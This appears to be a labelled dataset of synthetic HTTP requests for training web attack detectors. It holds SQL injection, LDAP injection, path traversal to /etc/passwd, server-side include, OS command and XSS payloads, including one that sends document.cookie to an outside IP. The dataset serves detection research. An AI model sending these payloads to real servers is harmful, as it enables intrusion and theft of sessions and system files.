UA-CPU: MIPS
UA-Disp: 924,263,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0640x829
Via: 3.9 www.edesotms.tiff:1, 3.4 201.178.12.215:8619, nntpp/4.8 www.ltTci.jpg
Transfer-Encoding: deflate
Upgrade: npelr/9.1, ir3/9.6, trmYd/3.9, egD/1.4, hafn8/5.0
Warning: 479 211.56.14.116 "qeorie44toHnoseg46" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48762
Start - Id: 43167
class: OsCommanding
GET /HhnhQos2lHpmnhdyel/LX.shtml?m5iiemZcenrnHti=109054&VirFlothuc=ninsert+e&oFJwRiVG7e=1675406&7Ndt=5502693&OzjU=fug%25%5B&etPOn=nneiselectTig%2Bo+Vcwtt0%3Dc&xa=passthru4+gbh&oltit=nK&iVdd3nidI=chavingS&ersnt9n0oaiiieA=tenncfiiansuno&kamereuI5owTcOg=4&NZZXfx4J=8767601&espdiorepso9=es-cEalK7dttea&sapc=re9gF&2D=%5Cn+++uftp++++-p++++www.trartionalve.com+++%2Fasil%2Flengni%2Fmeet%2Fmedeil%2Fat%2Fisatla HTTP/1.0
Host: www.totnwshx.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258;q=0.2, windows-1258, utf-8;q=0.1, x-mac-japanese;q=0.8, iso-8859-1
Accept-Encoding: *;q=0.0
Accept-Language: 3gitem-enr, t-tooetRsr;q=0.2, lpcMsosb-ueelmr;q=0.2
Cache-Control: no-store
Client-ip: 229.240.5.133
Cookie: avcthwztsEmtNe=mlga3k<s hc[ rCvbscript\olink;xDjaccess_log39-g=S7vtrd;lxIdrou98biah8g=391;jeh=nCOnnc6bdhntwa;awe=885561;ans=sla7mcqps2mn
Cookie2: $Version="045"
Date: Mon, 09 Apr 07 08:28:04 UTC
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: ritelu@ohts9eaeot.uk
If-Modified-Since: Mon, 17 Jul 06 04:42:59 GMT
If-Unmodified-Since: Thu, 04 Jan 07 23:29:44 UTC
If-Match: "M5CrER4YTPkml4C"
If-None-Match: "9G-r3zudstkL2b4S"
If-Range: Mon, 03 Jul 06 22:31:31 GMT
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic OWFyMXVlZDo2cnBobg==
Authorization: sunut6 3loaTnu4=nkxLfet
Range: 28678-4,-886
Referer: /ccnlIh.sh
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/9.9 (Windows; U; Win 9x 9.3; Lu-as; rv:3.2.2) Gecko/18777619
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: 7.1 www.ssttlemo.jpeg
Transfer-Encoding: qrcQeh
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43167
Start - Id: 41479
class: SqlInjection
POST /aeAE/oeesrlcetn/VafdmiagsyaqNrep.jsp? HTTP/1.0
Content-Length: 228
Content-Language: lTsp,tr6vsrCg,r
Content-Encoding: compress
Content-Location: /dQaopeey.pl
Content-MD5: eXRsYWVjbmFvZWVhVG9hYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Jan 10 11:19:35 UTC
Last-Modified: Wed, 04 Feb 09 22:14:56 UTC
Host: www.nntsh.uk:80
Connection: keep-alive
Accept: image/*;q=0.7, image/*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, deflate;q=0.2
Accept-Language: t-AoeHErs;q=0.5, o7oiAtvw-a2l;q=0.3, sIdcuaq-rc;q=0.9
Cache-Control: no-cache
Client-ip: 141.248.241.47
Cookie: ittttnieiej=9247712;rthas=6517;fhoacHet=0Cm;etjbapt6dri9ee=icn;ixiOt=ei
Cookie2: $Version="4"
Date: Fri, 26 Jan 07 03:09:23 GMT
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: 100-continue
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Wed, 20 Aug 08 16:40:40 CET
If-Unmodified-Since: Sat, 17 Jan 09 10:45:15 UTC
If-Match: "iGC_BYX0E1ngwljI"
If-None-Match: *
If-Range: Sat, 01 Jan 05 15:56:28 CET
Max-Forwards: 2754
MIME-Version: 4.3
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: Basic dG5pNWJlaDpybGVuc3R4
Range: 78-403185
Referer: http://www.itit.it/2tmsr/lloh5E/4eexlil/ierItstn.cfm
TE: gzip;q=0.0
Trailer: Accept-Encoding
User-Agent: iiieier
UA-CPU: MIPS
UA-Disp: 801,452,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0932x759
Via: 8.6 www.ln6oeh.css, FTP/2.5 161.76.234.172:0, FTP/1.8 www.ctaT.html
Transfer-Encoding: compress
Upgrade: duea/0.0
Warning: 644 www.or4te.js "ecd9adohmafA" "Sun, 18 Jan 09 08:09:07 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3HetaE=Elet&pesoeoorldeyo=9969936&iiiieeilelz9unl=3h5otehej&ehwhe=mBjm4JD&sn5=4308691&trai38uoeDzhey2='    )  UNION     ALL  SELECT     '3ti8na',4405,424,'Ond',4040 FROM   sp WHERE    (   ''  =    '

End - Id: 41479
Start - Id: 42555
class: SqlInjection
GET /lEeausdeiab/sin6rceHiatrsl/48taE02eeWtnyitm4bo/VFhb/gdO11Ms@.v/uHYtyK.nckKPMWh/dRqKXrO9a9metaNr/wKkXowEQw/SorI/bnsh@14oaqy6.gif?OYFe=chairs%27+++++UNION+SELECT+++h0+++FROM+++++dba_users++++WHERE+++++name++like++%27%2525&eumbpnFC7sTqzhe=78794034&_stdin24kDMdropbu=aofsNsecohhiunuey&0tntlrdwmAar=%5B0 HTTP/1.1
Host: 24.195.219.188
Connection: keep-alive
Accept: application/x-tar;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nGceeog-osccs, cej-ynesn0t;q=0.4
Cache-Control: only-if-cached
Client-ip: 29.213.12.81
Cookie: otoeojir=759553716;Ecraetiu4eabe05=ln;Tddo=4n;ecngarm=edzt6
Cookie2: $Version="597"
Date: Tue, 21 Mar 06 15:51:38 UTC
ETag: W/"Kz4lucxZCwp.GwKmCHYS"
Expect: 100-continue
From: aeaaa@xlGenlm.fr
If-Modified-Since: Sat, 25 Aug 07 14:03:08 CET
If-Unmodified-Since: Fri, 24 Dec 04 18:24:18 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 3
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: -9299
Referer: /Eltieo/Yd5B/nywt1/e5nAd0/ef0i.shtml
TE: gzip
Trailer: Expect
User-Agent: Mozilla/2.1 (compatible; 9ezncgod; Linux i586; hoRir8mol; e9shlrt; dnzoln25)
UA-CPU: 68000
UA-Disp: 962,664,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: HTTP/3.0 17.124.224.80:18, heskh/7.5 211.78.52.169, HTTP/9.6 114.33.117.158
Transfer-Encoding: compress
Upgrade: oui/8.3, tn8/9.7
Warning: 932 195.72.254.121:53 "lnpgreue" "Fri, 16 Oct 09 14:01:22 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42555
Start - Id: 41285
class: SqlInjection
GET /tPdgD432PN2F.php?L9DbG=tRGZmEe_7umw HTTP/1.0
Host: 101.236.201.76
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-age=8
Client-ip: 105.174.91.211
Cookie: vdOa1kaphsl0j=OR 'a4t' IN  ('')
Cookie2: $Version="29"
Date: Wed, 25 Nov 09 15:37:35 GMT
ETag: "J5QmpAO12KGDZIRzX9"
Expect: nozir=2tThasqs
From: umel3@8tnzus.com
If-Modified-Since: Wed, 26 Oct 05 18:38:40 UTC
If-Unmodified-Since: Fri, 18 Jul 08 24:38:14 GMT
If-Match: "c_N9oE1IJ4KapHoZf9"
If-None-Match: *
If-Range: Tue, 31 Mar 09 15:39:22 GMT
Max-Forwards: 6
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: 2Toi zCgjsab1=0cdocs
Authorization: NTLM ZXYyaXdlVmY0dG5uaG9yTnFnbmU2bW5uaWxzYWRFRzg=
Range: 845764-
Referer: http://www.uNaeam.cz/tTrosD/baizehI/szwrli.php4
TE: deflate,trailers,deflate
Trailer: Referer
User-Agent: oZsRWE3Qs http://www.ce27ae.be
UA-Disp: 9646,8421,16
UA-OS: Windows NT
UA-Color: color32
Via: eetork/9.5 239.225.222.144
Transfer-Encoding: deflate
Upgrade: U7st/3.6
Warning: 394 www.weersiR.gif "aniskp" "Tue, 27 Apr 04 18:40:06 UTC"
X-Forwarded-For: 90.26.199.114
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41285
Start - Id: 36947
class: LdapInjection
POST /ha6eu/mcyoanckrcan69qc/ectrqs/nu/ZGdocumentuSZyH6Gb/le8Dlonc/wnY9SO70a0dDor/ni/pOH6Ukc8D8Xz/rc/5nn1yeageSyrdff.sh? HTTP/1.1
Content-Length: 268
Content-Language: ntosistw,mu5si1b
Content-Encoding: deflate
Content-Location: http://www.itil.com/hop3a/lemAmedu/aNfzoeta/mrhsst9a/4noe.ace
Content-MD5: SWFjOUhqZXc5ZDRhY1R5dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Dec 09 07:02:47 GMT
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: 2.226.87.169
Connection: aO8toh
Accept: text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: hra-t;q=0.6, iEre-niS, To-hLpr
Cache-Control: min-fresh=42873
Client-ip: 211.137.222.198
Cookie: ff=ffWOrBDK;SVKKQ-rtB7l=i773ldbuw;etmn8n=rJOwbFVrCUv
Cookie2: $Version="3"
Date: Sun, 14 Jun 09 23:04:41 CET
ETag: "oFDKZi1jivzLDTUKzFTh"
Expect: 100-continue
From: ohnue@asue.fr
If-Modified-Since: Tue, 19 Apr 05 20:22:46 CET
If-Unmodified-Since: Thu, 18 Mar 10 22:22:38 GMT
If-Match: "T8--dE@@h@NLpZJMr1W"
If-None-Match: *
If-Range: "VfJLR@31t3l-FGgdpDLw"
Max-Forwards: 6
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="Srg4"
Range: 707-,38-117309
Referer: /Hdsc7oi.sh
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 9.6; iy-oj; rv:3.1.5) Gecko/65699840
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3317x800
Via: 8.2 5.78.241.105:8678, 6.2 www.coranqsi.html, FTP/6.8 26.40.18.134
Transfer-Encoding: identity
Upgrade: 7nr/8.5, fbe/4.0
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hche2hnm5eea=rp4Qcacxo&oea=sx hrE2uinputsme&HxftpnhSfJY=99&ntyfyohtt78Rdf=9061&0m13sgv=889&irmenscno=")(targetfilter=(o=NetscapeRoot))&jcY1zCYy=443085290&soaaieysireeep=00229&c4=410&oqvpkAspe=a ej%aconnectna&2oerRei=descript&f653wincludeHwdxp=daysa5f

End - Id: 36947
Start - Id: 45999
class: PathTransversal
POST /homefidgd3J3nph-vRgO/Nrhgeunto99tmqs8k/ejZ3-rs21PAH/_adminIoxc.cDp/nIsM/aTVYOZTr/ahLKyg/2caE9e4iS8qsc.mspx? HTTP/1.0
Content-Length: 88
Content-Language: drZ,roh
Content-Encoding: deflate
Content-Location: http://www.zXu4nyl.uk/nEywraLt/gePwre.js
Content-MD5: cnRudFlzMXR5RHdlZW9paw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 29 Sep 06 06:14:23 GMT
Last-Modified: Sat, 25 Mar 06 06:26:27 GMT
Host: www.bi3EnO.gov
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: oOgo-grr6kidw;q=0.1, osIeI-QiEt9, t-t;q=0.8
Cache-Control: no-cache
Client-ip: 43.254.7.157
Cookie: mereh=g:\\WINNT\\win.ini;edpwp0sst5=g0EUvE
Date: Sat, 14 Feb 09 13:33:51 GMT
ETag: W/"7Whex7ksVyEN-qcJHL"
Expect: 100-continue
From: h4leog@lneuabul.uk
If-Modified-Since: Tue, 09 Aug 05 16:35:11 GMT
If-Unmodified-Since: Tue, 17 Aug 04 10:30:57 GMT
If-Match: *
If-None-Match: *
If-Range: "5o0N3A8NwOjws6dj-r"
Max-Forwards: 6
MIME-Version: 8.3
Pragma: l='iOunetl'
Proxy-Authorization: NTLM bm85dHN0bmV3b3Z5YWF5dmxydEVmcGkxZG1nZWNuZWNyaA==
Authorization: Digest algorithm=MD5
Range: 78-,-3271
Referer: /otiwTfsg/xkehr/0xteuao.rar
TE: gzip,chunked;q=0.6,deflate;q=0.6
Trailer: Proxy-Authorization
User-Agent: daigyl/5.7.5.6.2
UA-CPU: Sparc
UA-OS: Linux
Via: 5.1 www.EtalOhfg.shtml, FTP/3.3 www.f2Hin.gif:90
Transfer-Encoding: lmir; sAKlmfa=tebiaI
Upgrade: vysgb/3.2, qh8Atn/8.2
Warning: 820 150.29.252.130 "mcb2NdatgsdhTOusu2o" 
X-Forwarded-For: 225.208.230.238
X-Serial-Number: 374979699289100440
~~~~~: ~~~~~~~~~~~~~~~~~

nodeWApMqKtd2e=0812241&d9t66Eihhpunl=tmnxp_9emeeesock_streamm&t6dliyp=2 &lmfhhneij9s=142

End - Id: 45999
Start - Id: 38637
class: LdapInjection
GET /Oc@6/6admin.ZwhereBN4/o.H@R/IgeouhuwnRe5deua/npcBhawTblJfvL.png?ibgv2rpeiuw=o&lvtosbyecon=l%26r&shhdp7netoc=esivxml&Ftusue3gihe3Aw=nedtreErnssear&41=susrs&chAoao6=5179&iA09mgteez=+w&XSKi_8k6GLdi=tndicznaEj&pCtl=tts&rrEpurlsseir=ntr%3Elt&bm=%29++++%28+++%7C++%28pe%3D8d*%29&etoerntfronn5w=e5&M8YP0_w=%25tiedv4te1wui HTTP/1.1
Host: 229.23.127.253:8
Connection: keep-alive
Accept: audio/*;q=0.8, text/*
Accept-Charset: utf-7, cp-950;q=0.2, cp-936, windows-1252, windows-1251;q=0.5
Accept-Encoding: deflate;q=0.6, gzip, identity;q=0.4
Accept-Language: HmSerRpa-ng, t-o5iacreE
Cache-Control: no-cache
Client-ip: 86.88.22.136
Cookie: eo0o=servicesisouspnvld>c 0a;ftTrcdph2rben=nlneipasswd&FaLBr i;ab3hewO36=mOynld0;mstjsbestm=mijtNpneegubnl1
Cookie2: $Version="732"
Date: Mon, 18 Feb 08 01:48:04 UTC
ETag: W/"vITvz6y6nZ8bl.S"
Expect: 100-continue
From: tn0thejR@aoGrudsiow.st
If-Modified-Since: Thu, 04 Jun 09 06:47:30 GMT
If-Unmodified-Since: Thu, 22 Feb 07 18:25:02 UTC
If-Match: "-BvHRjm7@GtoREvJO"
If-None-Match: "9dY8th..@MDBPCwuTyD"
If-Range: *
Max-Forwards: 31
MIME-Version: 9.0
Pragma: rverote='psa'
Proxy-Authorization: NTLM dGRrNTRlNG5ubG1kSGxuZXpzRW90ZWZkdHMydXlnbHJkc3I3bndHb2V5aGU=
Authorization: NTLM dWVFZWNnN1NlZVVlcE1oaUxpVHR5bWVxdG9SaWVsYUxvcm5zbjRlcmN6dG4=
Range: 25834-,48-325537
Referer: http://eiottr.uk/iLcrewte.swf
TE: deflate;q=0.9,chunked;q=0.3,deflate;q=0.0
Trailer: If-Modified-Since
User-Agent: lsqhres9At6eoHer
UA-CPU: MIPS
UA-Disp: 397,637,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/7.0 19.18.247.233
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 3254523964
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38637
Start - Id: 38537
class: LdapInjection
GET /rseS7/WXlG0/gservicesDC9SA/rwk-abXecGL47cX8/GjsameN-IV8wKo/aGN6O.mspx?a0Xoc=%2BatTYe%27R+iase7&5Duek=11516&4hn=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&iv3oeTM5ow0oe=055730&Tye@Nv=1111715&85o4seeniame5se=thsf+nrooi8g%5Ds&zLlwstbrU=32&5eushecMooaiz=4XyUO&dlcYi0i=rry5aa%5Cpassthrunph-diofh+&58I0=tuoti+lnm0lde-t&r9=5&e0ehoahtcetth=20828436&rto1PiabtevE=122301&Td7s3edihet4te=saNgs HTTP/1.0
Host: www.Tddsyddnfo.be
Connection: 9rrymn
Accept: image/*;q=0.9
Accept-Charset: x-mac-chinesesimp;q=0.3
Accept-Encoding: compress, gzip;q=0.0, identity
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 101.131.250.156
Cookie: 9tnoAdueLs=uandn<;hkws=2;S7bfs6i=st%;Li.-YnI=46293
Cookie2: $Version="187"
Date: Mon, 09 Jan 06 19:54:28 CET
ETag: W/"pVVhRVzv0Vn6S-Qqsb"
Expect: 100-continue
From: teee@ahlrhcs1d.org
If-Modified-Since: Thu, 16 Apr 09 19:56:01 GMT
If-Unmodified-Since: Thu, 28 Jul 05 23:59:25 GMT
If-Match: "z8DLD_b.OnZo@UGJk"
If-None-Match: "OwmyPRMGmUcX_0.n"
If-Range: *
Max-Forwards: 2
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: c0hR cjoints=SGlhrsu
Range: 447-,158917-
Referer: /nhrJsee/6thl/2sM3o.pl
TE: deflate,trailers
Trailer: If-Range
User-Agent: woi7 (83Nztm)
UA-CPU: MIPS
UA-Disp: 967,395,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8726x4401
Via: 6.0 www.ilps6no.css:615
Transfer-Encoding: compress
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38537
Start - Id: 47891
class: XSS
GET /Oaelznijlfrowa/RB2includeyOcVPn0/llQ.K@NVHX/shagaeloRINwAoe9B/sAQF2/eMs/PUAn0t6yn/nhpmhaeeksd/mAX@tAGdsA5_LC.Bas_y/sakse.jpg?may0msy9uas=1&Xi1null0Lz6=admingcvw%3ArlataY&ayenetetw7e=eilyAnsar&x27XXHR=3&at=%3Cimg+++++src+++%3D%22+++++itasorng+++%3E+++%22+++onmouseover+++%3D+%22+++%5Bwindow.open%28%27http%3A%2F%2F228.163.252.170%2Fitic.bin%27%2Bdocument.cookie%29%3B%5D%22+++%3E&resnih=mtS&aauueuduT=stm HTTP/1.1
Host: www.noaGbxqn.gov:80
Connection: keep-alive
Accept: application/*, audio/basic;q=0.5, application/postscript
Accept-Charset: ks_c_5601-1987, utf-8;q=0.8, isiri-3342
Accept-Encoding: 
Accept-Language: l9mets-ienqsMn;q=0.1, rLea-d, abtis-ltdyiyc;q=0.5, nrel1sz-wa2aatns, e9oeROy-reeeeeh
Cache-Control: no-transform
Client-ip: 214.6.140.12
Cookie: fibc3iey=28952;KbL0o1dyyd=219;6WtDjegbI=18
Cookie2: $Version="5"
Date: Thu, 07 Dec 06 08:28:42 GMT
ETag: "z@DKmFLK17Dvv.t9"
Expect: wqReiiom=hhgu2ntu
From: clrwp@noorqoy.ch
If-Modified-Since: Mon, 05 Nov 07 02:03:08 UTC
If-Unmodified-Since: Sat, 25 Sep 04 08:30:35 GMT
If-Match: *
If-None-Match: *
If-Range: "X_BqJYcW00mJ5D4lCoY"
Max-Forwards: 958
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM dHJzNWVuaHdBYUY2aHN0aGRldG9sZndobWV0czJsRWdoYWk1ZWc=
Authorization: NTLM cnZvbnRScjl1aUpkZHJuaHl0OHRmb3NzZXNlU2RhaW9mNE9vYXRhd1Rl
Range: -43,-33,199214-
Referer: http://www.dccsh1.org/Cegudr/CdNnrh9/jRpf/aPtsoi.cfm
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: If-Range
User-Agent: recea (28PvGW.; fomEUgQr; 29HYcRwHK; l@1udV; m3q-xPJ)
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 084x9415
Via: 1.8 246.164.138.81
Transfer-Encoding: oOtNne; ig9m=sooe
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 467 236.48.115.46:4 "dhenjbbwtagatsai" "Wed, 29 Mar 06 13:58:45 UTC"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47891
Start - Id: 36308
class: PathTransversal
GET /ejP0ha1brX/tN0cAYtMKZm/uhYTar8OdD5y/oniuntes.js?h2bsbgltsmor=HPerc1&tjbfbkniusnSm5=heg&heYbeeu9Nacnrt=3109959&sfitfa6nawdnb=0611463&drlget2St=06470761&twtu=d-wKVcW3uKFE&jtPoRbetweenKBKservicescI=n78o&ae8lro2=ret9ihna8dc4m5e5&etuusr=07ojt3dhq18iselbnK&ecefo0t=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&Dmi26l=qMMN&booeg=hnprrsoerts HTTP/1.0
Host: www.9eloegaf.st
Connection: w9GodN
Accept: */*;q=0.5
Accept-Charset: us-ascii;q=0.0, koi8-r;q=0.6
Accept-Encoding: identity;q=0.5, deflate, deflate
Accept-Language: dootzDr-wndhmeg;q=0.3, r-ooa1eis
Cache-Control: no-cache
Client-ip: 145.8.91.154
Cookie: n8oiol4ua=3de-q2tTMq2;soyns0=nteOftpsdbrzti)it
Cookie2: $Version="25"
Date: Thu, 13 Jan 05 20:17:04 GMT
ETag: "PR@C.gH8sSbya5og"
Expect: 100-continue
From: 5ygo@eiccrasaq.org
If-Modified-Since: Wed, 05 Mar 08 01:40:22 GMT
If-Unmodified-Since: Sun, 06 Mar 05 22:16:42 UTC
If-Match: "hyQcQJFAqasYIg81"
If-None-Match: *
If-Range: *
Max-Forwards: 693
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dWRVMWF0QWg6bnlwc3Q0ag==
Authorization: Basic bXMxZXJobzpzYXVyaWg=
Range: -24492,6727-90720
Referer: http://0oa30ee.cz/ooeyhr/hiHa/ttne.sh
TE: chunked,deflate;q=0.4
Trailer: Cache-Control
User-Agent: 8OpMSVC http://www.7toaneo.be
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 1.6 www.erott.gif
Transfer-Encoding: gzip
Upgrade: oafi/4.5
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 87.172.119.89
X-Serial-Number: 10989646571343616
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36308
Start - Id: 39581
class: SSI
GET /eizc6snta/hEc.png?txaItr5trqes=z&kINhetA=%3C%21--++++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+--%3E&e3eigbydeCnicai=on&f2KNL0a4from=75niesposition&wsn=h6%28lah+iiiott&xsturmter=eylgCkttvSogr5no&e3dr1sh2xma=img&5eamhhMee=yFWR&fcOzCexec7=74691&yUqpnodeopt=aahy%3F%2Fcb6ooaeeh&hsNb.oHRo@=oe&iqd1efaIySo8=co-&ohI5Y=5141 HTTP/1.0
Host: www.Lnu7gtyie.it:7012
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252, windows-1255;q=0.3
Accept-Encoding: identity;q=0.7, identity;q=0.3, identity;q=0.9
Cookie: WFKUQL9=eWF8RiGcy;stanaetnuq=e7r9j)ke%;t0r
Cookie2: $Version="759"
Date: Wed, 05 Aug 09 18:25:58 GMT
Pragma: rnnehwl='m0n54'
Referer: /eheqsj/biat/oleh/w7ico.swf
User-Agent: Mozilla/0.7 (X11; U; Open BSD i586 7.9; j5-en; rv:0.8.2) Gecko/75679924
UA-Disp: 779,442,32

null

End - Id: 39581
Start - Id: 44915
class: PathTransversal
GET /otw88Wb.q9dtF/mE6ggCe98w5ei-/2vxp_kZCQb56htpassX5Y/erG/rrb55than1a.jpg?einrown=1%40Ho&scaparidt=u8ermxSZ0n6R&u1ascftittAj=o1do&tTb=lcgpstsjtsjnetcat&nudaaDr09=h+%3Ceibinonph-o%3EturEbhe&TULeuf=c&e5oeiaao=c.Ln8kb&trf=7374168&tustio=egu&qeitaee=netcat9G&ZNYCKimge=blY24B5vPNGs&lah4Akh=collection%28++++file%3A%2F%2F%2Fc%3A%2Fae8y%2Ftla5hbl.xml+++++%29 HTTP/1.1
Host: www.oxs8eseCes.st:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: d2-t;q=0.2, e5i-hige;q=0.9
Cache-Control: only-if-cached
Client-ip: 117.77.195.37
Cookie: taa8o=sEaP;vwe9nhtae=199048;cexonednenneeap=ALwgetplxtermo1xgV;nFo49d-S5include_h=chi;sihtcr7ra=@1onhc>systemtLumxq
Cookie2: $Version="12"
Date: Sun, 17 Jan 10 02:48:22 UTC
ETag: W/"GnXifNSu_E2rpuvuvq-Q"
Expect: mai9
From: mrohh@9oymeFs.it
If-Modified-Since: Thu, 11 May 06 14:46:10 CET
If-Unmodified-Since: Tue, 14 Jul 09 03:46:41 GMT
If-Match: *
If-None-Match: "49ZDXTG-YKuJG4sNal1d"
If-Range: Tue, 01 Jul 08 09:38:13 CET
Max-Forwards: 615
MIME-Version: 8.3
Pragma: toys='srmoNJco'
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: c1Da srtarpts=Atit
Range: 50635-77
Referer: /n7nmiec.exe
TE: trailers,gzip;q=0.5
Trailer: Accept-Encoding
User-Agent: Mozilla/1.5 (compatible; MSIE 5.9; Unix; esee; ienph; thwsessea)
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6797x3315
Via: FTP/5.8 207.104.136.242:6, emEate/3.5 193.243.86.99, 0.5 213.49.248.186
Transfer-Encoding: roDnih
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 988 www.oihee.jpg:20 "etxoOiolmnofnnjob1c" "Mon, 09 Mar 09 19:24:20 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44915
Start - Id: 37403
class: LdapInjection
GET /avm/67.HRoMjntu@QQ5ecrpi/rratakb5o7asa4jsy.pl? HTTP/1.0
Host: www.ronaeiq3.org
Connection: close
Accept: video/mpeg, application/x-tar;q=0.1, text/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity, deflate;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 97.191.125.72
Cookie: siTrhonmif=k4u;ssnrecdoze=rVW)( |(clao=*)
Cookie2: $Version="803"
Date: Sun, 13 Mar 05 08:00:53 CET
ETag: W/"I4bxWhF3dD.58ZB"
Expect: 100-continue
From: a9rhuT@wsiL.cz
If-Modified-Since: Sun, 07 Dec 08 12:24:36 GMT
If-Unmodified-Since: Wed, 20 Oct 04 16:50:00 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Aug 05 17:57:17 UTC
Max-Forwards: 4970
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic aHNkZjpyc29lZQ==
Authorization: 95tih seNacxUu=emsg
Range: 0-,10-,1914-
Referer: /trhse/tebngaS/ehtyOA/j8ottmr/udkS.js
TE: trailers,trailers,chunked;q=0.2
Trailer: Max-Forwards
User-Agent: Xnf5evsyuohg
UA-Disp: 143,2118,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 233x3973
